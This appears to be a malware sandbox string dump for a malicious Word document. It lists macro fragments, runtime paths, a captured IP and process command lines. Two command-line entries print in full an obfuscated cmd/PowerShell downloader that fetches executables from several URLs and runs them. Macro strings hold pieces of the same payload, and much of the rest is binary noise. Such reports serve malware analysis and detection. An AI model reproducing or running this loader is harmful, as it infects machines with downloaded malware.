' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(08Normal.dotm1Microsoft Office Word@@W@W
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
-GetRows
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
/n "C:\02vPLpWc.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
8DLT\Normal.dotm1Microsoft Office Word@@W@W.+,0hp|
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
; =d%T,om3h-6JN.Oh-@6F4RPvEJ6( k*Ak*Mm.>PkTICv27Y}2t"!Za@-(SQEQ$R$C\
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>L#@0(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
<i#fKS4(}M:N\W`mR\iX%}Iut0=k>kJ#Tf_dZ/RNXFIVnu Cij(&Kh4nB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
>VYUb;bjbjGG.%d%d+++++????K?WWWWWFFF]]]]]]$<!*+FFFFF++WWZZZF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
?\&$*\Rffff*0<5cd8073f4&"bx"bdh`p"bPfX"bH`dh"bPfXd0"8@bH 0'. 4 6Wt 8% :MXX < >~X @ BX'2lato J'H N Pl RFw T)XX V XX Z \X'Ltu `'^ d fF ho jyFXX lp nY-X p rX'b v't z |y ~ XX G EvX X'xo(X ' .8 0XX +y |X X'58.72 ' R l
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@$y>U1I>+3BF"*)XwvTMNr+m\kaTJzR@E!csI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@Aq-QEQER sih((ByREPEP$2r}h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@aUPkBz(YhkAPVUiVu1A6(@YjTvzp68463E(nTVot(83577AWfWli94338(LCdzbME(77145A(ztozYAtA(TmLOA@(N OLVSL@$wzIizt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@N!Y]i-TnRB8zmmwSRtO"i32<`3xSP]"M9;
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@ocHjsC(iiJIQLqEdjX96136A$qpbDn199cqMofSdj@29py3BBZZCr|@* zfvbLFAPt90AAoKuzmqEsQSpi0DvLwDD@sGPRq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@tthqwZP(0zrpCwjjo19429UniJsp9AR QTncH72819BGJQU92JVHXWtJ27441rzocPOP@ljSHaW@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB4825FD0D0][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB482615770][O00000000]*C:\02vPLpWc.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
[Host Extender Info]
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\>XX ^ `X b dX'T h'f l nEP pO r1XX t{ v9X x zX'jY0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2,UUUU$'| '~ P r<XX fJ /$X X' ' Q '~ oXX MSX X'PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+mlOOOO$' ' m t BVXX PX X' ' k 'w |XX QT X X'=eiEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEpQQQ^Q$' ' Z i |QXX L eX X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\Z8WRxY5xkX{o,AqI'J(>}JK|G}$obDp] d`soLuYm\U+qer:>V%rc8m_WOJ}K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
^smkq<'ldZme5tSG8Pm#|:~^[,ka&&f5{7VR"4[v`v`1-=]Dx#eDj>ND.Y7|Fs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
_uiRM.Y<VaW8m>W7./\Vh$5vy"dP,YOw:DZV.b9
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
A5g@uh3>3-;:]*
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AIjza(hWYZq / @HNCjjs18890Fix(zwQqFr)) + 83688 - CLng(nabaH 70764#qvNnq33935 * ZPvSI3Str(55930)XmtpiU<BrsrBiEnd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
aQDWOjHWkzQXuDUL 31391@tludbP850fGRmvrv!F=6121Qoaul+ 550$P! RSmEzg!73pzuaNpauwXrqk!00IIDrcPuRTRQp5+ KpLRiDHzwV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
aVJlBH=RSDLAu lUWWW@#55496=BGz$EF=17=GDiaLQ=0=@zfRIRO58867=pswSvF>9044=TvELU@= FjLQLmXFSlm jAhYO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AVvICC3WIMY1O8zkJLXU`,6BOAYbQJCWzGdlsRXULw! ABpjOujd(zpuhn/ XDAQD@66571& zcovn"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
B,$"B+B'FPAOsHRZ@pzGcVH'FDP@'Os@RA@*pzG@*V?'K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Poster Compressed
Unicode based on Runtime Data
(WINWORD.EXE
)
Bp9fsc-QEQEQEQEQEQEQE I-PEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE;PEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEr9#((Is
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Brush Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
C_DhtE|q> [OWo#8/E(W[itrFWxc_1d~;s^%n.q}Eqc0T#M-^tOz}=
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CcDLj(ICMTmKzCVKBT!c6689zjOidb491 alwSBl320hDFQDjz802"HPNrcQ8 P3PUHzD $@ojFaqQ C GiBof@scSSG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cjbo-wJE@@EnJQE&FbdsmU@a0dasn@(( '( )'x'+]03[em ohS2,@878545B>, 1178<wvuWHkThnA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cjjUC_KAfMvWNidAmVGFcUKAAuwdGsXoRuJuYtjjCbNlEvXzLYTFYPEGCHwYe5qrIPhiizVPKjCzFYoFppMbU;xcdvcMS7}uMmHSRM_tWjIFU3EBajL$CvoMrCsCrE*-KzGXic=DWAhYtCdGR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00045852-00002952)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
CompanyName
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ctFWYNXIAXtYEjtM{/ 9792Q@zRvMPa72@QYAjitj``L21@VTGpuJ60`QNAQdjFfe800z0junarNlfcWpZjXEvoZbzwE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
cW1Table4f!WordDocumentSummaryInformation(sDocumentSummaryInformation8zdMacrosVBAdir__SRP_0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
CZnVv8(LZsjF / JOJlOA81407 Fix(JmoFur)) + 48222 - CLng(Xisuok*20096AHrilOT28026 * qozKN4Str@(8126)XH`CTBzQ<i bDvXBnLJZDtfUcc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DDVDGs(zzliYB@ zdJvIz27601<zpiBXd3`54105/j0QrzY-2568EpuoG*c1%3=DzknD
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
DefaultConnectionSettings
Unicode based on Runtime Data
(cosineinit.exe
)
e.|,H,lxIsQ}# +!,^$j=GW)E+&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
ExeName32="HdiQDbw"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F9Uzn*J.6%Il+s(((((((((((((+$'pO^^ACCgk,yF^?2.J1sIY^NnPZk/ixQAg#0:IYqPtinlQE&a_)@> Mr?#)WEW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
